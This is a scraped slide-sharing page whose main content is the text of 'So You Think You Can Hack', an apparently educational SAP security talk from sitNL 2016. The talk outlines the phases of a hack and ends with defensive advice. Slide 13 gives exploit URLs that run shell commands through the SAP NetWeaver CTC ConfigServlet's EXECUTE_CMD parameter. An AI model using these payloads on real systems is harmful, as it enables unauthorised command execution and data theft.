Masterclass Mendix (Jan Penninkhof / Twan van den Broek)Masterclass Mendix (Jan Penninkhof / Twan van den Broek)
Masterclass Mendix (Jan Penninkhof / Twan van den Broek)Twan van den Broek
 
Masterclass Machine Learning (Ronald Kleijn)
Masterclass Machine Learning (Ronald Kleijn)Masterclass Machine Learning (Ronald Kleijn)
Masterclass Machine Learning (Ronald Kleijn)Twan van den Broek
 
SAP Run Live Truck - SAP Cloud Platform use cases
SAP Run Live Truck - SAP Cloud Platform use casesSAP Run Live Truck - SAP Cloud Platform use cases
SAP Run Live Truck - SAP Cloud Platform use casesTwan van den Broek
 
Recap SAP Inside Track NL (sitNL)
Recap SAP Inside Track NL (sitNL)Recap SAP Inside Track NL (sitNL)
Recap SAP Inside Track NL (sitNL)Twan van den Broek
 
Welcome at SAP Inside Track NL (sitNL)
Welcome at SAP Inside Track NL (sitNL)Welcome at SAP Inside Track NL (sitNL)
Welcome at SAP Inside Track NL (sitNL)Twan van den Broek
 

Más de Twan van den Broek (20)

How SAP Leonardo is empowering animal wellbeing (Leon / Harmen)
How SAP Leonardo is empowering animal wellbeing (Leon / Harmen)How SAP Leonardo is empowering animal wellbeing (Leon / Harmen)
How SAP Leonardo is empowering animal wellbeing (Leon / Harmen)
 
Can you keep up with SAP Analytics Cloud? (Martijn van Foeken)
Can you keep up with SAP Analytics Cloud? (Martijn van Foeken)Can you keep up with SAP Analytics Cloud? (Martijn van Foeken)
Can you keep up with SAP Analytics Cloud? (Martijn van Foeken)
 
SAP Data Hub – What is it, and what’s new? (Sefan Linders)
SAP Data Hub – What is it, and what’s new? (Sefan Linders)SAP Data Hub – What is it, and what’s new? (Sefan Linders)
SAP Data Hub – What is it, and what’s new? (Sefan Linders)
 
SAP HANA SQL Data Warehousing (Sefan Linders)
SAP HANA SQL Data Warehousing (Sefan Linders)SAP HANA SQL Data Warehousing (Sefan Linders)
SAP HANA SQL Data Warehousing (Sefan Linders)
 
SAP analytics as enabler for the intelligent enterprise (Iver van de Zand)
SAP analytics as enabler for the intelligent enterprise (Iver van de Zand)SAP analytics as enabler for the intelligent enterprise (Iver van de Zand)
SAP analytics as enabler for the intelligent enterprise (Iver van de Zand)
 
Beyond OData introducing the xmla model for ui5 (Roland Bouwman)
Beyond OData introducing the xmla model for ui5 (Roland Bouwman)Beyond OData introducing the xmla model for ui5 (Roland Bouwman)
Beyond OData introducing the xmla model for ui5 (Roland Bouwman)
 
Integrating SAPUI5 with ArcGIS Maps (Leon van Ginneken)
Integrating SAPUI5 with ArcGIS Maps (Leon van Ginneken)Integrating SAPUI5 with ArcGIS Maps (Leon van Ginneken)
Integrating SAPUI5 with ArcGIS Maps (Leon van Ginneken)
 
SQL Data Warehousing in SAP HANA (Sefan Linders)
SQL Data Warehousing in SAP HANA (Sefan Linders)SQL Data Warehousing in SAP HANA (Sefan Linders)
SQL Data Warehousing in SAP HANA (Sefan Linders)
 
SAP Predictive Analytics (Nico van der Hoeven)
SAP Predictive Analytics (Nico van der Hoeven)SAP Predictive Analytics (Nico van der Hoeven)
SAP Predictive Analytics (Nico van der Hoeven)
 
Blockchain for the Enterprise
Blockchain for the EnterpriseBlockchain for the Enterprise
Blockchain for the Enterprise
 
DIR - A tribute to Standards and Guidelines... (Laurens van Rijn)
DIR - A tribute to Standards and Guidelines... (Laurens van Rijn)DIR - A tribute to Standards and Guidelines... (Laurens van Rijn)
DIR - A tribute to Standards and Guidelines... (Laurens van Rijn)
 
Building an innovation culture - Powered by diversity
Building an innovation culture - Powered by diversityBuilding an innovation culture - Powered by diversity
Building an innovation culture - Powered by diversity
 
SAP Leonardo / Machine Learning (Iver van de Zand)
SAP Leonardo / Machine Learning (Iver van de Zand)SAP Leonardo / Machine Learning (Iver van de Zand)
SAP Leonardo / Machine Learning (Iver van de Zand)
 
SAP TechEd recap (Ronald Konijnenburg / Sven van Leuken)
SAP TechEd recap (Ronald Konijnenburg / Sven van Leuken)SAP TechEd recap (Ronald Konijnenburg / Sven van Leuken)
SAP TechEd recap (Ronald Konijnenburg / Sven van Leuken)
 
Masterclass Mendix (Jan Penninkhof / Twan van den Broek)
Masterclass Mendix (Jan Penninkhof / Twan van den Broek)Masterclass Mendix (Jan Penninkhof / Twan van den Broek)
Masterclass Mendix (Jan Penninkhof / Twan van den Broek)
 
Masterclass Machine Learning (Ronald Kleijn)
Masterclass Machine Learning (Ronald Kleijn)Masterclass Machine Learning (Ronald Kleijn)
Masterclass Machine Learning (Ronald Kleijn)
 
SAP Run Live Truck - SAP Cloud Platform use cases
SAP Run Live Truck - SAP Cloud Platform use casesSAP Run Live Truck - SAP Cloud Platform use cases
SAP Run Live Truck - SAP Cloud Platform use cases
 
Recap SAP Inside Track NL (sitNL)
Recap SAP Inside Track NL (sitNL)Recap SAP Inside Track NL (sitNL)
Recap SAP Inside Track NL (sitNL)
 
Welcome at SAP Inside Track NL (sitNL)
Welcome at SAP Inside Track NL (sitNL)Welcome at SAP Inside Track NL (sitNL)
Welcome at SAP Inside Track NL (sitNL)
 
Finding ABAP
Finding ABAPFinding ABAP
Finding ABAP
 

Último

The McKinsey 7S Framework: A Holistic Approach to Harmonizing All Parts of th...
The McKinsey 7S Framework: A Holistic Approach to Harmonizing All Parts of th...The McKinsey 7S Framework: A Holistic Approach to Harmonizing All Parts of th...
The McKinsey 7S Framework: A Holistic Approach to Harmonizing All Parts of th...Operational Excellence Consulting
 
EUDR Info Meeting Ethiopian coffee exporters
EUDR Info Meeting Ethiopian coffee exportersEUDR Info Meeting Ethiopian coffee exporters
EUDR Info Meeting Ethiopian coffee exportersPeter Horsten
 
Cyber Security Training in Office Environment
Cyber Security Training in Office EnvironmentCyber Security Training in Office Environment
Cyber Security Training in Office Environmentelijahj01012
 
Horngren’s Financial & Managerial Accounting, 7th edition by Miller-Nobles so...
Horngren’s Financial & Managerial Accounting, 7th edition by Miller-Nobles so...Horngren’s Financial & Managerial Accounting, 7th edition by Miller-Nobles so...
Horngren’s Financial & Managerial Accounting, 7th edition by Miller-Nobles so...ssuserf63bd7
 
NAB Show Exhibitor List 2024 - Exhibitors Data
NAB Show Exhibitor List 2024 - Exhibitors DataNAB Show Exhibitor List 2024 - Exhibitors Data
NAB Show Exhibitor List 2024 - Exhibitors DataExhibitors Data
 
Fordham -How effective decision-making is within the IT department - Analysis...
Fordham -How effective decision-making is within the IT department - Analysis...Fordham -How effective decision-making is within the IT department - Analysis...
Fordham -How effective decision-making is within the IT department - Analysis...Peter Ward
 
Excvation Safety for safety officers reference
Excvation Safety for safety officers referenceExcvation Safety for safety officers reference
Excvation Safety for safety officers referencessuser2c065e
 
Interoperability and ecosystems: Assembling the industrial metaverse
Interoperability and ecosystems: Assembling the industrial metaverseInteroperability and ecosystems: Assembling the industrial metaverse
Interoperability and ecosystems: Assembling the industrial metaverseSiemens
 
business environment micro environment macro environment.pptx
business environment micro environment macro environment.pptxbusiness environment micro environment macro environment.pptx
business environment micro environment macro environment.pptxShruti Mittal
 
Healthcare Feb. & Mar. Healthcare Newsletter
Healthcare Feb. & Mar. Healthcare NewsletterHealthcare Feb. & Mar. Healthcare Newsletter
Healthcare Feb. & Mar. Healthcare NewsletterJamesConcepcion7
 
Technical Leaders - Working with the Management Team
Technical Leaders - Working with the Management TeamTechnical Leaders - Working with the Management Team
Technical Leaders - Working with the Management TeamArik Fletcher
 
Data Analytics Strategy Toolkit and Templates
Data Analytics Strategy Toolkit and TemplatesData Analytics Strategy Toolkit and Templates
Data Analytics Strategy Toolkit and TemplatesAurelien Domont, MBA
 
20220816-EthicsGrade_Scorecard-JP_Morgan_Chase-Q2-63_57.pdf
20220816-EthicsGrade_Scorecard-JP_Morgan_Chase-Q2-63_57.pdf20220816-EthicsGrade_Scorecard-JP_Morgan_Chase-Q2-63_57.pdf
20220816-EthicsGrade_Scorecard-JP_Morgan_Chase-Q2-63_57.pdfChris Skinner
 
20200128 Ethical by Design - Whitepaper.pdf
20200128 Ethical by Design - Whitepaper.pdf20200128 Ethical by Design - Whitepaper.pdf
20200128 Ethical by Design - Whitepaper.pdfChris Skinner
 
Pitch Deck Teardown: Xpanceo's $40M Seed deck
Pitch Deck Teardown: Xpanceo's $40M Seed deckPitch Deck Teardown: Xpanceo's $40M Seed deck
Pitch Deck Teardown: Xpanceo's $40M Seed deckHajeJanKamps
 
TriStar Gold Corporate Presentation - April 2024
TriStar Gold Corporate Presentation - April 2024TriStar Gold Corporate Presentation - April 2024
TriStar Gold Corporate Presentation - April 2024Adnet Communications
 
Unveiling the Soundscape Music for Psychedelic Experiences
Unveiling the Soundscape Music for Psychedelic ExperiencesUnveiling the Soundscape Music for Psychedelic Experiences
Unveiling the Soundscape Music for Psychedelic ExperiencesDoe Paoro
 
Psychic Reading | Spiritual Guidance – Astro Ganesh Ji
Psychic Reading | Spiritual Guidance – Astro Ganesh JiPsychic Reading | Spiritual Guidance – Astro Ganesh Ji
Psychic Reading | Spiritual Guidance – Astro Ganesh Jiastral oracle
 
1911 Gold Corporate Presentation Apr 2024.pdf
1911 Gold Corporate Presentation Apr 2024.pdf1911 Gold Corporate Presentation Apr 2024.pdf
1911 Gold Corporate Presentation Apr 2024.pdfShaun Heinrichs
 

Último (20)

The McKinsey 7S Framework: A Holistic Approach to Harmonizing All Parts of th...
The McKinsey 7S Framework: A Holistic Approach to Harmonizing All Parts of th...The McKinsey 7S Framework: A Holistic Approach to Harmonizing All Parts of th...
The McKinsey 7S Framework: A Holistic Approach to Harmonizing All Parts of th...
 
EUDR Info Meeting Ethiopian coffee exporters
EUDR Info Meeting Ethiopian coffee exportersEUDR Info Meeting Ethiopian coffee exporters
EUDR Info Meeting Ethiopian coffee exporters
 
Cyber Security Training in Office Environment
Cyber Security Training in Office EnvironmentCyber Security Training in Office Environment
Cyber Security Training in Office Environment
 
WAM Corporate Presentation April 12 2024.pdf
WAM Corporate Presentation April 12 2024.pdfWAM Corporate Presentation April 12 2024.pdf
WAM Corporate Presentation April 12 2024.pdf
 
Horngren’s Financial & Managerial Accounting, 7th edition by Miller-Nobles so...
Horngren’s Financial & Managerial Accounting, 7th edition by Miller-Nobles so...Horngren’s Financial & Managerial Accounting, 7th edition by Miller-Nobles so...
Horngren’s Financial & Managerial Accounting, 7th edition by Miller-Nobles so...
 
NAB Show Exhibitor List 2024 - Exhibitors Data
NAB Show Exhibitor List 2024 - Exhibitors DataNAB Show Exhibitor List 2024 - Exhibitors Data
NAB Show Exhibitor List 2024 - Exhibitors Data
 
Fordham -How effective decision-making is within the IT department - Analysis...
Fordham -How effective decision-making is within the IT department - Analysis...Fordham -How effective decision-making is within the IT department - Analysis...
Fordham -How effective decision-making is within the IT department - Analysis...
 
Excvation Safety for safety officers reference
Excvation Safety for safety officers referenceExcvation Safety for safety officers reference
Excvation Safety for safety officers reference
 
Interoperability and ecosystems: Assembling the industrial metaverse
Interoperability and ecosystems: Assembling the industrial metaverseInteroperability and ecosystems: Assembling the industrial metaverse
Interoperability and ecosystems: Assembling the industrial metaverse
 
business environment micro environment macro environment.pptx
business environment micro environment macro environment.pptxbusiness environment micro environment macro environment.pptx
business environment micro environment macro environment.pptx
 
Healthcare Feb. & Mar. Healthcare Newsletter
Healthcare Feb. & Mar. Healthcare NewsletterHealthcare Feb. & Mar. Healthcare Newsletter
Healthcare Feb. & Mar. Healthcare Newsletter
 
Technical Leaders - Working with the Management Team
Technical Leaders - Working with the Management TeamTechnical Leaders - Working with the Management Team
Technical Leaders - Working with the Management Team
 
Data Analytics Strategy Toolkit and Templates
Data Analytics Strategy Toolkit and TemplatesData Analytics Strategy Toolkit and Templates
Data Analytics Strategy Toolkit and Templates
 
20220816-EthicsGrade_Scorecard-JP_Morgan_Chase-Q2-63_57.pdf
20220816-EthicsGrade_Scorecard-JP_Morgan_Chase-Q2-63_57.pdf20220816-EthicsGrade_Scorecard-JP_Morgan_Chase-Q2-63_57.pdf
20220816-EthicsGrade_Scorecard-JP_Morgan_Chase-Q2-63_57.pdf
 
20200128 Ethical by Design - Whitepaper.pdf
20200128 Ethical by Design - Whitepaper.pdf20200128 Ethical by Design - Whitepaper.pdf
20200128 Ethical by Design - Whitepaper.pdf
 
Pitch Deck Teardown: Xpanceo's $40M Seed deck
Pitch Deck Teardown: Xpanceo's $40M Seed deckPitch Deck Teardown: Xpanceo's $40M Seed deck
Pitch Deck Teardown: Xpanceo's $40M Seed deck
 
TriStar Gold Corporate Presentation - April 2024
TriStar Gold Corporate Presentation - April 2024TriStar Gold Corporate Presentation - April 2024
TriStar Gold Corporate Presentation - April 2024
 
Unveiling the Soundscape Music for Psychedelic Experiences
Unveiling the Soundscape Music for Psychedelic ExperiencesUnveiling the Soundscape Music for Psychedelic Experiences
Unveiling the Soundscape Music for Psychedelic Experiences
 
Psychic Reading | Spiritual Guidance – Astro Ganesh Ji
Psychic Reading | Spiritual Guidance – Astro Ganesh JiPsychic Reading | Spiritual Guidance – Astro Ganesh Ji
Psychic Reading | Spiritual Guidance – Astro Ganesh Ji
 
1911 Gold Corporate Presentation Apr 2024.pdf
1911 Gold Corporate Presentation Apr 2024.pdf1911 Gold Corporate Presentation Apr 2024.pdf
1911 Gold Corporate Presentation Apr 2024.pdf
 

So You Think You Can Hack | sitNL 2016

  • 1. SYTYCH#16 So You Think You Can Hack
  • 2. • Company specialised in securing SAP systems and infrastructures • SAP Security consulting • Regular presenters on SAP Security in Security conferences • Research: In worldwide top 5 for found SAP Security vulnerabilities • Developer Protect4S - Security Analyser for SAPTM • SAP Development Partner • Our mission is to raise the security of mission–critical SAP platforms with minimal impact on day–to–day business. Joris van de VisFred van de Langenberg Robin Vleeschhouwer ERP Security
  • 4. Collective hack = Grouphack ≠ Grouphug What are we going to do… Hack a SAP system collectively
  • 5. But wait… Isn’t that illegal? Yes (in many cases) it is. Hence the disclaimer: Hacking is illegal and very naughty. This presentation is not aiming to stimulate or approve hacking. This presentation is meant for academic and educational purposes only. Find the Get-out-of-jail-free card here: I herewith approve all participants of SitNL#16 to hack my SAP system on host XXX Only on November 26 2016.
  • 6. <TIP>During this presentation QR codes will be shown to simplify calling long URLS’s. You might want to consider installing an App on your mobile phone called a QR code scanner to prevent typing really long URL’s. </TIP> Handy…
  • 7. Anatomy of a hack… We will go through some common steps of a a hack / penetration test Step 1 – Reconnaissance Gathering of data about the target. Step 2 – Scanning / enumeration Scan the perimeter internally and externally for vulnerabilities. Step 3 – Gain access Use the gathered info retrieved from previous steps to gain access to the target. Step 4 – Keep access / go further To successfully perform an attack access must be maintained over a certain period of time. Also further penetration of the target might be needed to go for the targets crown jewels. Step 5 – Delete tracks Be cautious, don’t get noticed or caught. Make sure to delete your tracks, logs, tooling, created users, etc, etc.
  • 8. Step 1: Reconnaissance Step 1 - Reconnaissance Try to gather a much information as possible on the business and way of working of the target. Find information like how they operate, type of used systems, procedures, IP- range, domain names, mail serves, dns, etc, etc.. Tooling: social media, (Facebook, linkedin), Google and for example shodan and censys http://whois.domaintools.com/erp-sec.com https://www.shodan.io/search?query=sap+netweaver
  • 10. Step 2: Scanning Step 2 – Scanning / enumeration Scan the environment internally and externally to get a clear image of the target. Scanning is done to find open ports with behind them hopefully vulnerable services. Scanning is most often done on network level, think about portscans, scans for specific services, firewall scans, scans to detect Operating Systeem version, etc. Tooling: network scanning- and other scanning tools like NMAP, responder.py, network sniffing tools like Wireshark, keyloggers, etc, etc (Really too many to name)
  • 11. Step 2: Scanning Step 2 – Scanning / enumeration https://pentest-tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap 1 2 3 4 http://<XXXX>:50000/bestaatsinterklaasnuwelofniet?
  • 13. Step 3: Gaining access Step 3 – Gaining access Try to gain access to 1 or more systems using information gathered before. From there extract valuable information or further penetrate the landscape. Tooling: Create your own, use exploitation tools to exploit vulnerabilities via SQL injection, xss, csrf, RCE, directory traversal, code injection, verb tampering, etc. Again, too many to name. Use social engineering to hack the human. http://<XXXXXXXX>:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet? param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ls http://XXXXXXXXXXXXXXX:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=c om.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20supergeheimen.txt
  • 14. Step 3: Gaining access
  • 15. Towards solutions - There is no silver bullet solution - SAP (Platform) security goes beyond team boundaries. Involve: - SAP Basis team - SAP Authorisations team - Database team - Operating system team - Network team - Involve management, not a pure technical party - Create a Security process, instead of a onetime project - You might consider using tooling to support this process.
  • 17. Questions? For more information please vitit https://www.erp-sec.com
  • 18. SAP, R/3, ABAP, SAP GUI, SAP NetWeaver and other SAP products and services mentioned herein as well as their respective logos are trademarks or registered trademarks of SAP AG in Germany and other countries. All other product and service names mentioned are the trademarks of their respective companies. Data contained in this document serves informational purposes only. The authors assume no responsibility for errors or omissions in this document. The authors do not warrant the accuracy or completeness of the information, text, graphics, links, or other items contained within this material. This document is provided without a warranty of any kind, either express or implied, including but not limited to the implied warranties of merchantability, fitness for a particular purpose, or non-infringement. The authors shall have no liability for damages of any kind including without limitation direct, special, indirect, or consequential damages that may result from the use of this document. SAP AG is neither the author nor the publisher of this publication and is not responsible for its content, and SAP Group shall not be liable for errors or omissions with respect to the materials. No part of this document may be reproduced without the prior written permission of ERP Security BV. © 2013 ERP Security BV. Disclaimer